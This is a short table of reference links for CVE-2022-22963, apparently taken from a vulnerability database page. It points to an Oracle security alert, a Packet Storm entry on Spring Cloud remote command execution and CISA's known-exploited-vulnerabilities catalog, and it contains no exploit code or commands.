| oracle.com |
GitHub CVE
|
https://www.oracle.com/security-alerts/cpujul2022.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/173430/Spring-Cloud-3.2.2-Remote-Command-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-22963 |